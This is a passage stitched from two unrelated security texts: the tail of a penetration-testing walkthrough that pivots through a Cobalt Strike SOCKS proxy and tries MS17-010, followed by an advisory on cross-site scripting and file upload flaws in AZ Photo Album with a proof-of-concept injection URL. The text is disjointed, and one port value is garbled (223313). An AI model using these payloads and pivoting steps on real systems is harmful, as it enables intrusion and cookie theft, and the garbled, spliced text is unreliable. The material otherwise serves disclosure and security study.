11. Add a socks proxy in the local Kali config: vim /etc/proxychains.conf, adding a socks4 line with the CS host IP and port (the port value in the source, 223313, is garbled).
12. Since the web server has NOD32 installed and reaches the Internet, there should be other network segments. MS17-010 was attempted without success.

Source: https://xz.aliyun.com/t/8586

source: https://www.securityfocus.com/bid/53641/info

AZ Photo Album is prone to a cross-site scripting vulnerability and an arbitrary file upload vulnerability because it fails to properly sanitize user-supplied input.

Attackers can exploit these issues to steal cookie information, execute arbitrary client-side script code in the context of the browser, upload and execute arbitrary files in the context of the web server, and launch other attacks.

http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20

http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest